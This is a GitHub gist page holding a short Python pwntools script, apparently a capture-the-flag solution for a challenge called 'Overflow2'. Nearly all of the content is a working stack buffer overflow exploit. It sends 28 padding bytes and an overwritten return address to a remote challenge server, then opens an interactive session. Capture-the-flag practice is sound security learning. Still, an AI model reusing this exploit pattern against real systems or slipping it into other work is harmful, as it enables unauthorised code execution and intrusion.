Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save InersIn/2c34f6632e4d39294e2836303be6154f to your computer and use it in GitHub Desktop.
Save InersIn/2c34f6632e4d39294e2836303be6154f to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
from pwn import *
b=ELF("./Overflow2")
r=remote("cyberyoddha.baycyber.net",10002)
payload='a'*28
payload+='r\x91\x04\x08'
r.sendline(payload)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment